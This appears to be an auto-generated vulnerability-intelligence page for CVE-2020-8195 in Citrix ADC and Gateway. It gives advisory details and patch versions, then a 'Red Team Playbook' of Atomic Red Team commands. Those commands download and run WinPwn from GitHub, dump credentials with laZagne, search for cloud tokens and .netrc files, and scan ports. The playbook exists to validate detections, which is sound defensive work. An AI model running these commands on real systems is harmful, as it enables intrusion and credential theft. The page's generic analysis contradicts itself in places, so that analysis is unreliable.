CVE-2020-8195
Overview
This vulnerability is a result of improper input validation in Citrix ADC, Citrix Gateway, and Citrix SDWAN WAN-OP firmware. The root cause lies in insufficient sanitization of user-supplied input within certain components responsible for request processing, leading to the potential exposure of sensitive information. The affected components include firmware versions prior to specified releases in Citrix ADC and Gateway, as well as Citrix SDWAN WAN-OP, specifically in modules handling user requests and access control.
Vulnerability Description
Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.
Impact
An attacker with low-privileged access can leverage this vulnerability to obtain sensitive information that should be restricted, potentially including configuration details or system data. This exposure can aid further attacks by revealing internal system structure or credentials. Exploitation does not require elevated privileges beyond a low-privileged user account, nor user interaction, facilitating reconnaissance and lateral movement within affected environments. The consequence is a breach of confidentiality that may lead to broader security compromises if leveraged effectively.
Solution
Citrix has released patches addressing this vulnerability in the following firmware versions: Citrix ADC and Gateway versions 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14, and 10.5-70.18, as well as Citrix SDWAN WAN-OP versions 11.1.1a, 11.0.3d, and 10.2.7. Administrators should apply these updates promptly. Detailed patching instructions and advisories are available at https://support.citrix.com/article/CTX276688. No specific workarounds are noted in the advisory, so updating to the fixed versions is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Citrix ADC and Citrix Gateway, along with Citrix SDWAN WAN-OP, stems from improper input validation, which can lead to limited information disclosure to low privileged users. This flaw arises when the systems fail to adequately validate input data, allowing unauthorized access to sensitive information that should be restricted. The affected versions of these products include several iterations of the ADC and Gateway firmware, which are widely deployed in enterprise environments for application delivery and secure remote access. The lack of robust input validation mechanisms can expose the systems to risks where malicious actors could exploit this weakness to gain insights into the internal workings of the application, potentially leading to further attacks.
Attack vectors for this vulnerability are primarily through user interactions with the affected systems. An attacker could leverage social engineering tactics to trick low privileged users into accessing malicious links or submitting crafted input that the system inadequately validates. Once this input is processed, the attacker may receive unintended information, such as configuration details or user data, which could be exploited for further attacks. Additionally, if the attacker has any form of access to the network where these devices are deployed, they could attempt to probe the system for weaknesses, making it easier to exploit this vulnerability. The potential for exploitation is significant, especially in environments where sensitive data is handled, as the attacker could use the disclosed information to escalate privileges or launch more sophisticated attacks.
The real-world impact of this vulnerability can be substantial, particularly for organizations that rely on Citrix products for critical operations. Limited information disclosure may seem benign at first glance; however, it can lead to a cascade of security issues. For instance, if an attacker gains access to internal configurations or user credentials, they could pivot to more sensitive areas of the network, leading to data breaches or service disruptions. The business risks associated with such breaches include financial losses, reputational damage, and regulatory penalties, especially in industries that require strict compliance with data protection laws. Organizations must recognize that even seemingly minor vulnerabilities can serve as gateways to larger, more damaging attacks.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as vendors often release updates that address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and user input handling. Employing Web Application Firewalls (WAFs) can also help filter and monitor HTTP requests, providing an additional layer of defense against malformed input. Furthermore, educating users about safe browsing practices and the risks associated with social engineering can reduce the likelihood of successful exploitation.
In conclusion, the improper input validation vulnerability in Citrix ADC, Citrix Gateway, and Citrix SDWAN WAN-OP presents a notable risk to organizations that utilize these products. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies is essential to safeguard sensitive information and maintain the integrity of their systems. As the cybersecurity landscape continues to evolve, proactive measures will be key to defending against emerging threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-8195, with telemetry indicating the emergence of new exploitation attempts after a period of dormancy. Although the EPSS score has decreased significantly, reflecting a lower overall likelihood of widespread exploitation, the recent uptick in detection signals that threat actors are actively probing vulnerable Citrix ADC, Gateway, and SD-WAN WAN-OP appliances. This shift underscores the importance of continued vigilance, as the presence of exploitation attempts—even if limited—suggests adversaries may be refining tactics or targeting specific environments. The current exploit landscape remains devoid of publicly disclosed new exploit variants, but the observed activity highlights a persistent risk that could escalate if leveraged in targeted campaigns. Consequently, while the medium severity rating remains appropriate, defenders should recognize that the threat posture has become more dynamic, warranting sustained monitoring to detect potential escalation or lateral movement attempts exploiting this vulnerability.
Affected Products (14)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Gateway Firmware | All |
cpe:2.3:o:citrix:gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Gateway Plug-In For Linux | All |
cpe:2.3:a:citrix:gateway_plug-in_for_linux:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8195 |
| support.citrix.com |
GitHub CVE
x_refsource_MISC
|
https://support.citrix.com/article/CTX276688 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8195 |